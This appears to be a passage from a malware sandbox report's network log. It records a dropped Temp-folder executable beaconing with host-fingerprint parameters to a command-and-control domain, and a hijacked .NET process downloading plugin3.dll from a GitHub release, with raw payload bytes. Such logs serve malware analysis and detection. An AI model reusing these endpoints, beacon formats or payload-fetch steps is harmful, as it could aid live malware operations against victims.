9d 6a 62 4e 21 d9 02 5f ec 75 e1 Data Ascii: YlTc(4BJ~$b3H/@\)RuT\|(v)!W"ajy.t$PtK07M1yAKA#4)pZ^-[&UJdtcP^"av2TwuA\|BJT#~R,c}-dfn4%YF"WcPRQy4.jbN!_u
2024-08-31 20:42:34 UTC	1369	IN	Data Raw: ab 5e 59 e0 a1 ad 39 3d b2 33 92 99 f4 15 9b 85 37 4a 22 fc 6a fd b3 82 ac 75 0a 8f 26 17 21 b7 9f 74 67 42 a4 58 98 0d 62 a4 c7 70 04 37 b5 63 41 33 db 31 02 18 7c d5 18 67 20 38 ff 5c bc d8 27 5a 69 4e 85 3d 5c 0b 6b f3 bc 23 57 48 2a 5c 04 96 44 f4 54 e8 a6 6b 48 92 c1 13 10 fb 58 58 6d 65 c6 53 a9 43 53 6c 46 3c 04 e7 8c 6d 9d 87 fb 37 c2 32 e9 61 bb fd 47 8a 46 e8 a8 8e 37 a5 3e 64 c7 bd 1a e7 e4 66 c6 b2 ce 8c f4 d6 2f 43 67 b6 ae 3b ef b6 5d 1d 5e c0 76 d6 e4 f3 59 93 9d 4d d2 4c d5 dc 55 d0 42 0e c6 f1 a6 fe 14 ea 9c 21 1a 07 1b cc ac 93 96 cb 83 e7 50 f2 c4 5a dc 25 d2 99 d9 f1 5a dd fe a6 bc 7d c8 31 c4 2a bd db 76 56 c5 ea 61 f1 7e 77 dd 63 ef ca 89 ef fc be be 47 91 a8 b9 23 ec 2e 92 eb 6d cf a8 e1 7c a5 d0 ea 74 ed 4a 1f 23 ce a8 d6 fb b0 08 Data Ascii: ^Y9=37J"ju&!tgBXbp7cA31\|g 8\'ZiN=\k#WH\DTkHXXmeSCSlF<m72aGF7>df/Cg;]^vYMLUB!PZ%Z}1vVa~wcG#.m\|tJ#
2024-08-31 20:42:34 UTC	1369	IN	Data Raw: 56 c4 04 ab 9c 5f b9 e7 d6 4b 2b 3f ff 81 90 ec f3 aa 2a bf 49 26 d8 ea b1 91 20 3b 8c f9 b1 1a 22 69 b1 ec 5c b9 46 fb 18 fe 9e b0 a7 00 0b f3 19 5f 45 07 40 9b 70 83 19 dc 27 2c c8 43 eb e2 41 e5 2c fe dc 64 f2 17 b0 17 13 06 dc ee 06 fa dc de c2 fb 1b 3c b5 2c 09 85 ec 84 4b d0 b9 22 3c 49 41 22 85 78 6c 34 af ca 53 b1 03 61 f5 e9 1f 25 7c 3a 6a 57 e1 8d 4c f7 e9 2b 29 c4 2d 81 6e fb 98 a8 69 d7 24 6a 77 e4 be 1a 9e b8 f9 84 de 9c 34 03 b8 02 20 66 db 9c e2 9a 8d 36 11 93 38 85 24 ab 2c 38 b3 8d 34 69 ce 9e a6 90 22 2a 4a 19 00 3b 81 47 8e f1 eb 60 4a 96 56 c0 28 99 e0 50 fe 80 2f 26 80 4a 8d c5 0b d5 f7 fd 5c a9 48 5c 34 75 72 eb 3a fe dc 7b 0b dc 61 68 0d 50 b0 7b 0f ce ee 67 19 05 ce 72 26 da 28 5e 01 bd 2e d1 70 a3 5d ee 9b 7b cd f2 70 4c 76 8b 69 Data Ascii: V_K+?I& ;"i\F_E@p',CA,d<,K"<IA"xl4Sa%\|:jWL+)-ni$jw4 f68$,84i"J;G`JV(P/&J\H\4ur:{ahP{gr&(^.p]{pLvi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49808	140.82.121.4	443	4628	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:34 UTC	120	OUT	GET /DamnCrypt/Zd8fux7fzhe2u7w/releases/download/Test/plugin3.dll HTTP/1.1 Host: github.com Connection: Keep-Alive
2024-08-31 20:42:35 UTC	996	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Sat, 31 Aug 2024 20:42:34 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/782711733/d424d098-b503-4902-b23f-cacb231ad890?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240831%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240831T204234Z&X-Amz-Expires=300&X-Amz-Signature=97c525f89adf13ec2bd6fb64e7fa3496235cc389517f40e7b5c36b7bd790d0c0&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=782711733&response-content-disposition=attachment%3B%20filename%3Dplugin3.dll&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-08-31 20:42:35 UTC	3261	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49810	188.114.96.3	443	8176	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:35 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
2024-08-31 20:42:35 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mpo8EYnQjouAa9Y3HUqG0AZNduSqIx%2BD2qccXpG5hqS53z%2BkIO2pDmTU8s6wpMnlSPMmhQJDH7%2FJcbEZaSuIBjVBT4Cyo7EDJ0Iy8kUT0xDbZUJP2YuAG2XyXjEl9%2B5Kk4Kkmc%2B6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd912fa858c60-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:35 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:42:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49813	188.114.96.3	443	5900	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:35 UTC	362	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9AD0 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
2024-08-31 20:42:36 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OmgWYNRNjJ0foPp8H7vxTfEJ6T1qUz1z4Rc5U0iSubGvr9WGyOXPAbfR9ySOIIp%2Fq%2BeEqqjIfOlxhKLiDpMzAA8QKDGEyDvmkYa9sMOU2e9o4C%2FfoGYdcmaUOnVQ1BOI7qfWcEP0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd91568251879-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:36 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:42:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49814	185.199.110.133	443	4628	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:35 UTC	587	OUT	GET /github-production-release-asset-2e65be/782711733/d424d098-b503-4902-b23f-cacb231ad890?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240831%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240831T204234Z&X-Amz-Expires=300&X-Amz-Signature=97c525f89adf13ec2bd6fb64e7fa3496235cc389517f40e7b5c36b7bd790d0c0&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=782711733&response-content-disposition=attachment%3B%20filename%3Dplugin3.dll&response-content-type=application%2Foctet-stream HTTP/1.1 Host: objects.githubusercontent.com Connection: Keep-Alive
2024-08-31 20:42:35 UTC	795	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2355928 Content-Type: application/octet-stream Last-Modified: Thu, 25 Jul 2024 09:53:36 GMT ETag: "0x8DCAC8FA7600C94" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: ce2aae2e-801e-0056-5b07-fa10ba000000 x-ms-version: 2020-10-02 x-ms-creation-time: Thu, 25 Jul 2024 09:53:36 GMT x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=plugin3.dll x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Fastly-Restarts: 1 Accept-Ranges: bytes Age: 0 Date: Sat, 31 Aug 2024 20:42:35 GMT X-Served-By: cache-iad-kjyo7100090-IAD, cache-ewr-kewr1740078-EWR X-Cache: HIT, MISS X-Cache-Hits: 402, 0 X-Timer: S1725136956.835406,VS0,VE7
2024-08-31 20:42:35 UTC	1378	IN	Data Raw: 44 23 9f e8 31 56 0a 39 19 46 04 b2 93 d3 2b 15 92 b9 41 9f 76 68 02 84 ee 02 c2 a9 4b 2d c5 ae 58 9c 3d ef 6a e9 60 a0 fe cd 55 63 4c f3 f1 4d c5 3f 43 ce 71 6c e0 2e ef b5 ab 37 fc 42 db 89 7c d1 98 40 54 68 f3 8e ab 51 a0 71 1e 1b 8a 6a ef 20 f6 38 14 6a a0 6d f5 d3 74 7c 26 d7 6d 8e f3 c6 d7 ba 6c fc bb 2a b0 02 4e 3e 3b 20 b3 7c 50 a0 ba 44 ec 96 21 65 d5 8e d3 25 0f 3b 3d 6c 34 6c 85 de 86 99 ba 8d 1c 8c d1 2e a6 a6 0a 3f 80 49 c5 f5 bf 4d aa 97 97 1a 72 24 36 4a 4d c3 da c4 c6 d8 d6 96 bb a2 6e 29 29 ad 4e c9 0e bf bc a2 6c da 0d 2a cd 3d 60 5c 5f 75 02 44 24 85 95 80 d3 01 dd d2 6e c5 60 46 41 84 5d d3 fe 22 bb cc 9d 18 eb 22 df 2d d8 25 fd f1 f5 53 42 a0 93 83 10 2a 21 d6 95 4f 99 b3 57 8d dd 35 b4 97 77 33 2b dd 35 ae 69 92 ce 66 36 57 6a 2a 09 Data Ascii: D#1V9F+AvhK-X=j`UcLM?Cql.7B\|@ThQqj 8jmt\|&mlN>; \|PD!e%;=l4l.?IMr$6JMn))Nl=`\_uD$n`FA]""-%SB!OW5w3+5if6Wj
2024-08-31 20:42:35 UTC	1378	IN	Data Raw: a5 ad b6 98 90 40 b2 fa d0 a1 ae 58 2e 6d 96 38 7f 66 2c 1b 33 ea b5 0e 34 11 fe c1 a1 72 62 90 7a a9 29 8e 86 64 eb 8a 8e 9a e0 17 b9 c4 da 7c 29 2f ad 2e 9d ab 45 0c d5 bd 38 75 ae 3f 30 2f bb 20 92 f7 25 03 b4 e2 8f 8a 1c f0 d5 f9 89 30 8b 78 7a d1 96 d3 02 72 39 9c 26 80 93 39 ed 1c ef 8c e2 0c d0 d2 8b 1d eb 08 39 55 9f c9 fd 13 1e 83 b9 12 0f 0d bb ca cb fa c3 7f d8 97 12 d4 d3 a9 0b ac f6 68 d3 dc ae 5e d0 00 17 ce 2f 92 2a 36 b3 49 7a a1 7e ee 6b de 28 0c de 67 33 cd 29 f8 b2 a2 0a 5c 66 f4 df b2 4b e5 96 ad 77 7f 1f 81 e3 3a 9f d1 a2 8d 02 46 31 fd de db 61 75 3f ab 70 85 a3 a5 6b 21 16 eb 9a 8f a8 1f 3b b8 61 87 5a c0 c4 88 be ff f5 c4 9e ec b9 a4 fc bd e6 96 02 5f a9 81 65 a9 8e 2a 14 34 9e 5a 95 e5 8d 14 ed fd d6 6c 85 01 4a 22 c5 a0 a9 a1 d7 Data Ascii: @X.m8f,34rbz)d\|)/.E8u?0/ %0xzr9&99Uh^/6Iz~k(g3)\fKw:F1au?pk!;aZ_e4ZlJ"
2024-08-31 20:42:35 UTC	1378	IN	Data Raw: 90 24 e7 5e 99 4f c6 68 bc 99 52 89 c5 1c c7 90 44 18 e8 91 a9 94 78 33 84 40 b2 70 1d ff 7b 07 cd 0e 39 94 af 40 bf 98 b1 07 c1 d6 01 62 4c d9 10 3e 55 5d fb b2 67 ad 4e ec 6f f5 68 ff c8 4b d9 cb da 51 df 93 c7 c8 4b e9 84 6b 96 d9 d1 67 2a a6 6e 53 a1 c9 0d 63 41 04 f8 ca f4 68 c9 e3 96 a4 b8 7c 43 f8 34 be 7e fe 13 bd 0d c5 cf b2 cd a3 7b 92 c8 8f 4f 2e 0f 49 4c 16 5c 3b 3c 65 5e 1c e8 25 f5 54 ff 7f f7 53 05 06 ff 5b 65 f7 d3 42 6d 23 51 71 f2 7d 7c ac f7 fc 5c 68 1d a6 78 12 d5 77 94 4e 0f 85 00 c2 c6 a0 29 30 e1 4a c7 dc 14 31 13 ab 26 9b cf 02 94 97 2d d5 5f c9 e5 18 bb e6 bf 41 b0 e5 04 5e 88 e9 11 bc 83 db b9 d5 a7 dd c7 b9 08 df c9 69 ef ba 43 d9 f9 65 40 a4 aa 44 39 91 c0 f1 d1 44 42 3a 85 e7 4b 15 c1 14 92 4f a1 c8 8c e9 9b 0c 7d 58 3e 0c e9 Data Ascii: $^OhRDx3@p{9@bL>U]gNohKQKkg*nScAh\|C4~{O.IL\;<e^%TS[eBm#Qq}\|\hxwN)0J1&-_A^iCe@D9DB:KO}X>
2024-08-31 20:42:35 UTC	1378	IN	Data Raw: f9 e6 a0 e9 f9 c3 ee 8d 7d 59 1e 06 06 b2 97 e7 e7 a8 df 6d e9 48 9a b6 6d d5 bd 75 1c 6a df b2 10 cd 44 d7 77 70 a9 b0 d3 41 82 89 fd b1 bd 27 03 19 57 eb 2e 74 5b 89 1c 74 6a 87 73 b4 0c ef 3a 92 94 3b dc 20 b8 94 2d 5e 83 c2 d0 dc 77 ea a5 75 94 fb f7 d2 22 71 1f 86 2e fb fa 43 c3 c8 55 0f 0e 9c 97 23 26 cc 7e 41 8b 18 d0 96 f6 44 f5 f3 c6 e1 e2 a9 0e ac 70 fa 02 df 30 61 05 d9 0d 90 09 da 68 df e8 4d 21 d7 2f ff 77 06 30 c4 7b a3 aa 0f db 98 87 02 fe 07 48 1a 10 d0 de 25 a0 d9 eb 76 69 fa 5c 53 62 53 0a bf ba 29 d2 75 24 ff bd 30 3a 0b 7a 62 25 42 73 a4 8e 89 6f 7c 09 0c 1f 58 7b ef f0 91 7d cb 90 65 61 80 c7 7a fe 6b 4b 08 ab f5 e8 43 4a a1 b0 07 4a ea d1 a5 4a bf 19 32 6d c1 09 ab 8e 56 ad 93 0a b0 58 05 81 48 35 fb d0 bb a2 20 7a fa be 8b d9 bd 2e Data Ascii: }YmHmujDwpA'W.t[tjs:; -^wu"q.CU#&~ADp0ahM!/w0{H%vi\SbS)u$0:zb%Bso\|X{}eazkKCJJJ2mVXH5 z.
2024-08-31 20:42:35 UTC	1378	IN	Data Raw: 7d cc 52 a9 13 fa 02 9a bf 10 85 b6 ce f9 77 78 c2 a6 69 71 68 84 ff 20 47 0e 65 73 7c 4a f2 dc 41 9e 0b 5c 11 e1 0e 0e 59 eb 46 4f ea 0f c0 c6 c7 da c2 29 e2 c4 eb 23 70 e9 36 91 72 19 e7 18 ed 53 43 23 2e 2a 2a bc 07 b9 95 15 0c d1 08 d9 29 4e 67 fb b6 b2 d3 06 3c ea 87 95 de 42 c7 e7 cd 41 83 d0 d0 fa 6c 83 56 43 37 2a a9 6c 9a 5a f7 26 93 22 c1 8d 15 2a de ac 9b 01 d9 68 c4 6f 5e 75 28 38 a3 60 c6 ed bc 63 94 a6 50 7c d6 2d 78 30 05 f6 a1 ae 2d b7 0f ba 2e 6e 5f 2f d5 69 47 54 f4 5d 6a a6 ad f9 64 1e c5 1c 30 7e a9 8a c6 80 c2 88 98 df 20 9c 2e 27 71 fa 35 a6 35 56 8b 86 f5 1c d1 96 17 16 f8 4b 57 ea 4d 47 03 83 73 4a 1e 80 ba ba 3a ae f9 00 c8 a1 4c 32 2c c3 59 c7 f0 73 cb 2a 4d 53 cf 59 02 0a 10 bb 86 4d ff 3b c9 31 7a 89 88 a1 8f 79 a6 8b 49 35 4c Data Ascii: }Rwxiqh Ges\|JA\YFO)#p6rSC#.*)Ng<BAlVC7lZ&"ho^u(8`cP\|-x0-.n_/iGT]jd0~ .'q55VKWMGsJ:L2,YsMSYM;1zyI5L
2024-08-31 20:42:35 UTC	1378	IN	Data Raw: 30 89 06 cb 74 92 7f 7a 09 6c 82 4b 44 bf eb b3 9a 5f 2b 0d 99 56 ed bd e2 d7 2c 16 16 ef 1a 14 c3 17 93 ac 4f 24 d2 54 84 c4 d7 74 47 ae 9e 41 23 b1 02 38 b6 de f8 05 af 40 0d 49 0d fc 5e 64 a3 b2 82 2e 11 4a 07 d3 ab d3 8a a1 91 92 b6 9f 9a ac 90 05 33 83 73 15 5e 95 c5 70 04 b1 85 11 96 ba d1 aa 9e 51 ba 7e 15 e3 b9 14 be 2a 3f 33 8f 79 8f b5 9b ba 1b f7 8b b0 bf 7f 98 de d1 6d 67 6b 01 5a 9c c3 b3 2a 90 09 e9 6a ce 85 1c aa b2 9d 4a b3 4f 2a 70 53 0d be c6 b2 6c 53 da 6b 0d 36 34 cb f7 fb 14 6f cb 8b e2 93 30 0a b3 c8 9d d6 ae ba 21 4b 9a ab 3b 3a 3e 6f 59 d0 14 4b bf 06 27 f8 a4 3c d6 f0 52 38 5c 39 58 90 44 d4 82 83 c2 1a ee 26 98 fd e4 bf 89 d8 6e af 07 d0 07 28 f3 a7 f1 a8 5b 1a 0a 4e d6 a1 28 50 58 4a 21 99 1f 4e 11 b6 d8 5a a9 58 5b 54 ce ce 61 Data Ascii: 0tzlKD_+V,O$TtGA#8@I^d.J3s^pQ~?3ymgkZjJO*pSlSk64o0!K;:>oYK'<R8\9XD&n([N(PXJ!NZX[Ta
2024-08-31 20:42:35 UTC	1378	IN	Data Raw: a9 b1 0c fc cc 53 94 a1 54 58 9b e1 10 f5 d4 b3 88 61 b1 c5 90 96 70 77 5b 80 98 78 6d 53 0a 0b 65 0f 2c a1 65 0d f5 c8 52 cf 10 e9 59 ae 29 84 1e 0f ec 16 db 28 5f fb 8b 6a fa be cf 24 17 fb 7d 3f cc a9 33 90 7c c9 2c e3 c3 35 a9 c9 43 bd e4 0e 8d 13 06 85 b9 80 80 f3 a0 61 1b f8 0b 7c c3 9e f3 a9 4d 65 4b 3a 48 91 e2 81 8b b4 6e ad 5f cd c0 e0 f3 67 af 36 53 ca 2a 14 8e fd 95 c9 17 0d 70 04 c3 3a 33 11 c2 14 e2 63 25 d8 57 93 2b 47 14 d9 ec cb 48 96 ad 12 66 bb ab 77 21 9d 24 5c 17 e5 f9 06 c5 62 ac f2 64 82 1b a6 7a 1f 31 f7 fd 4d 09 f9 c0 0c f8 8c 22 a6 e4 23 1b 39 08 ac 26 58 fa fe 0e 08 8e 05 9c 63 35 cf 62 75 7a db 04 bb 71 56 ba bb 9a e3 0c 55 c9 22 74 19 b7 e4 05 45 66 65 76 cd 79 92 03 ea 71 11 4a bf 5d d5 ef 91 4a a7 ca 2d b4 1d ac d3 f7 e9 9e Data Ascii: STXapw[xmSe,eRY)(_j$}?3\|,5Ca\|MeK:Hn_g6S*p:3c%W+GHfw!$\bdz1M"#9&Xc5buzqVU"tEfevyqJ]J-
2024-08-31 20:42:35 UTC	1378	IN	Data Raw: 8e 07 32 a2 c1 20 89 d3 60 c2 d4 37 6c 50 2a 58 ef 99 7a 5d a4 fc ee 13 3f 16 fe 8c ee 00 de 75 b2 14 2e a3 2a 75 ad 9e f1 a3 3d 7f c6 50 d1 53 63 88 f7 e9 b6 dd 8e d6 ed 64 c2 b2 e9 fe f3 bb f9 d8 e4 cd 86 b3 fe f8 16 fb d1 74 38 e1 54 18 e3 f3 6b 22 04 91 cc 53 e4 be a2 21 7e 31 12 62 e5 29 00 f8 a5 7f 47 d7 ac eb fb 4b 25 1d 5e 20 43 02 09 e4 83 92 59 37 8c 00 31 82 49 e9 d1 23 72 e1 e5 78 13 39 ea 75 10 8a 20 5d 62 3c 37 72 4a 4c e0 dd 95 d8 69 32 06 1b d3 f6 92 1e eb 97 4e 63 2d 7d ce 76 bf ff 72 6b be c6 a1 ba 22 1d 0f 33 3a f9 4c c4 8e ad 56 17 ac 8c ac 13 d5 c8 d2 31 0c 3a 03 eb 12 d3 be 83 04 a7 ac 1d cc 35 f6 b7 bd 77 ed 8c ea 02 92 1e 61 f8 7d e2 5d 04 58 f1 c2 70 06 6a b4 32 cc 54 f1 e5 bb 45 f6 dd 55 60 48 67 42 ea 18 e4 29 ee 34 c9 4b 50 66 Data Ascii: 2 `7lPXz]?u.u=PScdt8Tk"S!~1b)GK%^ CY71I#rx9u ]b<7rJLi2Nc-}vrk"3:LV1:5wa}]Xpj2TEU`HgB)4KPf
2024-08-31 20:42:35 UTC	1378	IN	Data Raw: 9f 0d f7 b6 fc 17 46 6b db b5 de 72 46 70 27 af 87 31 98 42 58 e3 65 c5 13 d5 c1 53 27 f9 6b ea 3a d9 da 1d fd bf 48 4b 23 02 b6 89 0d 3a 2d 89 30 20 f8 a2 02 22 97 7d 50 1b 86 be 31 0e d7 41 f0 b0 9f 24 78 70 6e d6 7e bd 77 bd 29 f7 f8 6d 02 1e cc 6f a4 41 20 8a f9 67 81 14 94 10 cf 41 c4 3d 40 ba 76 8c 6e 03 e9 64 ca 53 5a 67 fe fb 36 1c e9 4d 45 d4 4e ef 5e f6 3c 75 de 9a d8 ee 4f 20 4a 59 5b 90 e9 a3 1b 97 ec 3a 9f 3c f9 ea 9e cd 64 6c 4f b7 18 f5 2a f9 97 1e 03 60 d5 bf 18 7d c1 36 b0 75 83 e9 15 81 13 f1 bb cc c9 55 7b eb f6 e1 7a 03 4b 32 14 dc b3 8f 1b 45 f8 f1 b4 5b 2d 4c f7 64 a1 10 0d 2f 59 3a 2f fe 08 46 2c f8 3a ee f0 c5 40 c0 ad 6f c4 68 ce c9 05 09 99 e3 40 46 5b fe 6d 5a 29 66 00 69 70 f4 aa db b8 88 e4 4f d9 37 68 07 22 32 7b 30 0f b9 95 Data Ascii: FkrFp'1BXeS'k:HK#:-0 "}P1A$xpn~w)moA gA=@vndSZg6MEN^<uO JY[:<dlO*`}6uU{zK2E[-Ld/Y:/F,:@oh@F[mZ)fipO7h"2{0
2024-08-31 20:42:35 UTC	1378	IN	Data Raw: 73 bf d9 6f d7 55 e4 95 bb 95 bf 88 cd e9 70 80 d7 ef 05 e7 1b fc fb ab 33 c2 ed 1c 7d fe 52 5e 45 de dc bc e7 23 d8 a2 df 65 ca d7 52 b2 f5 a8 d9 be 4f 39 ba 31 6d 71 8e 9f 53 04 5e 0d 29 34 55 f1 13 b1 14 49 15 8e 87 e6 92 da 73 55 c0 65 89 df 1f 18 d3 bb ca f9 24 63 00 d5 11 e6 00 4e 81 fc 0a 0f ea 0e 68 3c b5 a5 6d ac 8a 48 14 3f 09 11 be 72 28 3e e2 88 d0 72 b4 79 91 e8 ec ff 6c 86 4b 87 82 0e c1 3b 8c 2f c1 ac 3f fe 48 12 b1 3f 1c 5e ea 34 e5 ce 5c 8b ad ed 5a fb e9 a6 4e c6 a6 33 d5 47 69 3c 55 d8 57 16 d5 d2 4f bc ba de e0 73 07 fb 13 82 fb f6 33 1f 45 65 f5 ac 9e d5 ac a9 9e fc d0 ce 3f db 81 ba 20 9b 2e 01 78 7b 69 79 c8 e7 6c e2 b7 39 c0 78 89 b0 26 61 29 ca f3 ec 2f 48 01 0d a9 53 8f 45 60 9b 6a 7f 32 57 1f 86 5b 0c 3f af 36 f0 c6 84 b1 3b 13 Data Ascii: soUp3}R^E#eRO91mqS^)4UIsUe$cNh<mH?r(>rylK;/?H?^4\ZN3Gi<UWOs3Ee? .x{iyl9x&a)/HSE`j2W[?6;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49818	188.114.96.3	443	5900	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:37 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
2024-08-31 20:42:37 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FokrxIQlOk1ysps5yD9siel1UGUErJKDBsFQxFhbIIIGPBkcPN1shOGvT6RB4lYAMjj5B3Ik7Y0oSddlk%2FxPKI28J2tql4jTgFh1hu1lxF3%2BiqpklqWFbezlyMjvn7OJNQ0Df8wV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd91f0c8243a7-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:37 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:42:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49821	188.114.96.3	443	8176	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:37 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
